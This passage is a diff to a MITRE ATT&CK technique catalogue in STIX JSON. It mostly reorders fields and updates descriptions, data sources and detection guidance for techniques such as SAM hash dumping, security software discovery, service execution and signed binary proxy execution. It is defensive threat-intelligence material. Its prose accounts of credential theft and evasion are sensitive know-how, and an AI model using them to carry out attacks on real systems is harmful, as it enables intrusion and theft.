- "x_mitre_detection": "Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.",
- "x_mitre_permissions_required": [
- "SYSTEM"
+ "x_mitre_contributors": [
+ "Ed Williams, Trustwave, SpiderLabs"
],
"x_mitre_data_sources": [
"Process command-line parameters",
"PowerShell logs",
"Process monitoring"
],
- "x_mitre_contributors": [
- "Ed Williams, Trustwave, SpiderLabs"
+ "x_mitre_permissions_required": [
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -23560,6 +24445,11 @@
"source_name": "mitre-attack",
"external_id": "T1518.001",
"url": "https://attack.mitre.org/techniques/T1518/001"
+ },
+ {
+ "source_name": "Expel IO Evil in AWS",
+ "url": "https://expel.io/blog/finding-evil-in-aws/",
+ "description": "Anthony Randazzo, Britton Manahan and Sam Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020."
}
],
"object_marking_refs": [
@@ -23567,7 +24457,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Security Software Discovery",
- "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.",
+ "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.\n\nAdversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)",
"id": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -23576,8 +24466,22 @@
"phase_name": "discovery"
}
],
- "modified": "2020-03-15T01:15:56.113Z",
+ "modified": "2020-06-29T17:32:24.787Z",
"created": "2020-02-21T21:16:18.066Z",
+ "x_mitre_data_sources": [
+ "Stackdriver logs",
+ "Azure activity logs",
+ "AWS CloudTrail logs",
+ "File monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -23588,17 +24492,6 @@
"Office 365",
"Azure AD",
"SaaS"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring",
- "Process command-line parameters"
]
},
{
@@ -23664,20 +24557,20 @@
],
"modified": "2020-03-25T15:42:48.910Z",
"created": "2020-01-24T17:16:11.806Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator"
],
+ "x_mitre_detection": "Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)",
"x_mitre_data_sources": [
"DLL monitoring",
"Windows Registry",
"Loaded DLLs"
],
- "x_mitre_detection": "Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--2715c335-1bf2-4efe-9f18-0691317ff83b",
@@ -23748,18 +24641,18 @@
],
"modified": "2020-02-17T13:16:53.850Z",
"created": "2020-02-12T18:56:31.051Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_data_sources": [
+ "Process monitoring"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.",
"x_mitre_permissions_required": [
"root"
],
- "x_mitre_data_sources": [
- "Process monitoring"
+ "x_mitre_detection": "Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
]
},
{
@@ -23789,27 +24682,27 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-25T23:30:20.871Z",
+ "modified": "2020-04-17T17:47:57.075Z",
"created": "2019-06-28T17:52:07.296Z",
- "x_mitre_detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.\n\nProcess monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) ",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux",
+ "macOS"
+ ],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM",
+ "root"
+ ],
+ "x_mitre_version": "1.1",
"x_mitre_data_sources": [
"Netflow/Enclave netflow",
"Process monitoring",
"File monitoring",
"Application logs"
],
- "x_mitre_version": "1.1",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM",
- "root"
- ],
- "x_mitre_platforms": [
- "Windows",
- "Linux",
- "macOS"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.\n\nProcess monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) "
},
{
"id": "attack-pattern--f44731de-ea9f-406d-9b83-30ecbb9b4392",
@@ -23827,6 +24720,22 @@
"created": "2017-05-31T21:30:36.550Z"
},
{
+ "created": "2020-03-10T18:33:36.159Z",
+ "modified": "2020-03-28T18:52:02.384Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "execution"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "description": "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).\n\n[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals)\n\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.",
+ "name": "Service Execution",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -23844,22 +24753,6 @@
"source_name": "Russinovich Sysinternals"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Service Execution",
- "description": "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).\n\n[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals)\n\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.",
- "id": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "execution"
- }
- ],
- "modified": "2020-03-28T18:52:02.384Z",
- "created": "2020-03-10T18:33:36.159Z",
"x_mitre_platforms": [
"Windows"
],
@@ -23921,6 +24814,20 @@
],
"modified": "2020-03-29T01:52:53.947Z",
"created": "2020-02-20T15:31:43.613Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
+ "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.",
+ "x_mitre_data_sources": [
+ "Netflow/Enclave netflow",
+ "Network device logs",
+ "Network intrusion detection system",
+ "Web application firewall logs",
+ "Web logs",
+ "SSL/TLS inspection"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -23931,21 +24838,7 @@
"Office 365",
"Azure AD",
"SaaS"
- ],
- "x_mitre_data_sources": [
- "Netflow/Enclave netflow",
- "Network device logs",
- "Network intrusion detection system",
- "Web application firewall logs",
- "Web logs",
- "SSL/TLS inspection"
- ],
- "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.",
- "x_mitre_impact_type": [
- "Availability"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ ]
},
{
"id": "attack-pattern--39a130e1-6ab7-434a-8bd2-418e7d9d6427",
@@ -23988,6 +24881,13 @@
"created": "2017-05-31T21:30:49.119Z"
},
{
+ "id": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)",
+ "name": "Service Stop",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"external_id": "T1489",
@@ -24010,13 +24910,6 @@
"description": "Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Service Stop",
- "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)",
- "id": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -24024,8 +24917,9 @@
"phase_name": "impact"
}
],
- "modified": "2019-07-18T19:18:32.674Z",
+ "modified": "2020-07-14T19:34:47.636Z",
"created": "2019-03-29T19:00:55.901Z",
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Windows"
],
@@ -24083,29 +24977,29 @@
],
"modified": "2020-03-26T19:37:28.912Z",
"created": "2020-03-12T20:43:53.998Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Travis Smith, Tripwire",
+ "Stefan Kanthak"
],
- "x_mitre_detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. ",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_effective_permissions": [
- "SYSTEM",
- "Administrator",
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"Process command-line parameters",
"Services",
"File monitoring"
],
- "x_mitre_contributors": [
- "Travis Smith, Tripwire",
- "Stefan Kanthak"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_effective_permissions": [
+ "SYSTEM",
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. ",
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -24163,32 +25057,32 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-26T19:43:33.981Z",
+ "modified": "2020-06-20T22:01:09.906Z",
"created": "2020-03-13T11:42:14.444Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_defense_bypassed": [
+ "Application control"
],
- "x_mitre_contributors": [
- "Travis Smith, Tripwire",
- "Matthew Demaske, Adaptforward"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_effective_permissions": [
+ "SYSTEM"
],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_detection": "Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.",
"x_mitre_data_sources": [
"Windows Registry",
"Services",
"Process command-line parameters"
],
- "x_mitre_detection": "Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
+ "x_mitre_contributors": [
+ "Travis Smith, Tripwire",
+ "Matthew Demaske, Adaptforward"
],
- "x_mitre_effective_permissions": [
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_defense_bypassed": [
- "Process whitelisting"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -24254,21 +25148,21 @@
],
"modified": "2020-03-27T00:43:58.149Z",
"created": "2020-01-30T14:11:41.212Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
},
{
"id": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65",
@@ -24299,24 +25193,24 @@
],
"modified": "2020-03-28T18:14:36.980Z",
"created": "2017-05-31T21:31:40.542Z",
- "x_mitre_version": "2.0",
- "x_mitre_contributors": [
- "Stefan Kanthak"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to %SystemRoot% and %ProgramFiles% directories will protect against module loads from unsafe paths. \n\nCorrelation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.",
"x_mitre_data_sources": [
"API monitoring",
"DLL monitoring",
"File monitoring",
"Process monitoring"
],
- "x_mitre_detection": "Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to %SystemRoot% and %ProgramFiles% directories will protect against module loads from unsafe paths. \n\nCorrelation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Stefan Kanthak"
],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.0"
},
{
"object_marking_refs": [
@@ -24361,20 +25255,20 @@
],
"modified": "2020-03-30T13:56:55.356Z",
"created": "2017-05-31T21:30:46.047Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_system_requirements": [
- "Shared webroot directory on remote system"
- ],
- "x_mitre_detection": "Use file and process monitoring to detect when files are written to a Web server by a process that is not the normal Web server process or when files are written outside of normal administrative time periods. Use process monitoring to identify normal processes that run on the Web server and detect processes that are not typically executed.",
+ "x_mitre_deprecated": true,
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring"
],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": false,
- "x_mitre_deprecated": true
+ "x_mitre_detection": "Use file and process monitoring to detect when files are written to a Web server by a process that is not the normal Web server process or when files are written outside of normal administrative time periods. Use process monitoring to identify normal processes that run on the Web server and detect processes that are not typically executed.",
+ "x_mitre_system_requirements": [
+ "Shared webroot directory on remote system"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -24405,21 +25299,21 @@
],
"modified": "2020-03-24T16:41:00.821Z",
"created": "2020-02-14T13:35:32.938Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
+ "x_mitre_detection": "The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n",
"x_mitre_data_sources": [
"Office 365 audit logs",
"Authentication logs",
"Application logs"
],
- "x_mitre_detection": "The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ]
},
{
"external_references": [
@@ -24474,24 +25368,24 @@
],
"modified": "2020-03-25T17:21:27.487Z",
"created": "2020-01-24T19:00:32.917Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_contributors": [
- "Travis Smith, Tripwire"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
],
+ "x_mitre_detection": "Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
+ "x_mitre_contributors": [
+ "Travis Smith, Tripwire"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4",
@@ -24515,9 +25409,27 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T17:19:19.724Z",
+ "modified": "2020-06-20T22:39:02.045Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "2.1",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.\n\nMonitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.",
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control",
+ "Digital Certificate Validation"
+ ],
+ "x_mitre_contributors": [
+ "Nishan Maharjan, @loki248",
+ "Hans Christoffer Gaardl\u00f8s",
+ "Praetorian"
+ ],
"x_mitre_data_sources": [
"API monitoring",
"File monitoring",
@@ -24529,32 +25441,13 @@
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_contributors": [
- "Nishan Maharjan, @loki248",
- "Hans Christoffer Gaardl\u00f8s",
- "Praetorian"
- ],
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Process whitelisting",
- "Application whitelisting",
- "Digital Certificate Validation"
- ],
